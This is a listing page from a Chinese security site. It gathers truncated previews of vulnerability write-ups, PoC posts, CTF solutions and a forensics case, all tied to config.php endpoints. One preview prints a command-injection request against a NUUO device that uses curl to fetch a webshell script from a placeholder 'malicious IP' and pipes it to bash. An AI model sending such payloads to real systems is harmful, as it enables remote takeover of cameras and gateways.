config.php | CN-SEC 中文网

安全漏洞

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

0x01 漏洞杀伤链攻击向量： GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1Host: t...

04月29日35 views评论

阅读全文

安全漏洞

NUUO 摄像头handle_site_config.php远程命令执行漏洞附POC

1. NUUO 摄像头漏简介微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发 NUUO 摄像头 2.漏洞描述 NUUO 是NUUO公司的一款小型网络硬盘录像机设备...

02月26日144 views评论

阅读全文

CTF专场

CTFshow 萌新题

本文作者:无名安全团队-火之高兴WEB-1<html><head> <title>ctf.show萌新计划web1</title> <...

12月18日21 views评论

阅读全文

代码审计

发货100cms存在SSRF漏洞分析

厂商官网：https://www.fahuo100.cn/ 下载最新版本即可。影响版本：v1.1_build20240803 漏洞分析：涉及到的文件：admin/config.php...

12月02日18 views评论

阅读全文

安全漏洞

瑞斯康达智能网关list_base_config.php接口存在任意文件上传漏洞附POC

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使...

08月19日124 views评论

阅读全文

安全漏洞

康达vpn-list_base_config.php存在命令执行漏洞

简介网络设备是指用于连接、管理、监控和优化计算机网络中的通信和数据传输的硬件设备。这些设备包括路由器、交换机、防火墙、访问点等，它们共同协作，以确保网络的高效、安全和稳定运行。网络设备的主要功能是实现...

08月19日43 views评论

阅读全文

安全漏洞

康达vpn-list_base_config.php存在命令执行漏洞

08月19日72 views评论

阅读全文

安全博客

PHP 写配置文件经典问题

题目代码如下<?phpif(!isset($_GET['option'])) die();$str = addslashes($_GET['option']);$file = file_get_...

08月18日10 views评论

阅读全文

2019 fireshell web Vice

题目所给源码<?php //require_once 'config.php'; class SHITS{ private $url; private $method; private $add...

08月17日安全博客13 views评论

阅读全文

安全漏洞

【HW-day】某某康达vpn list_base_config 远程命令执行漏洞【附poc】

免责声明：本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动，若利用本文提供的内容或工具造成任何直接或间接的后果及损失，均由使用者本人负责，所产生的一切不良后果均与文章作者及本账...

08月16日52 views评论

阅读全文

安全漏洞

Raisecom智能网关 list_base_config 远程命令执行漏洞【附poc】

fofa body="oForm.user_name.value" 资产页面一、漏洞简述 Raisecom智能网关是瑞斯康达公司面向中小企业及行业分支机构推出的新一代语音融合接入型网络...

07月29日393 views评论

阅读全文

取证分析

【鉴定实战】某虚拟币传销案件

来源：弘连网络在数字化快速发展的今天，网络传销已成为一种新型的非法活动，它披着“创业”、“投资”等外衣，吸引了不少人参与，但背后却隐藏着巨大的风险。与传统的传销相比，网络传销具有隐蔽性强、传播速度快、...

07月03日18 views评论

阅读全文

在线咨询

微信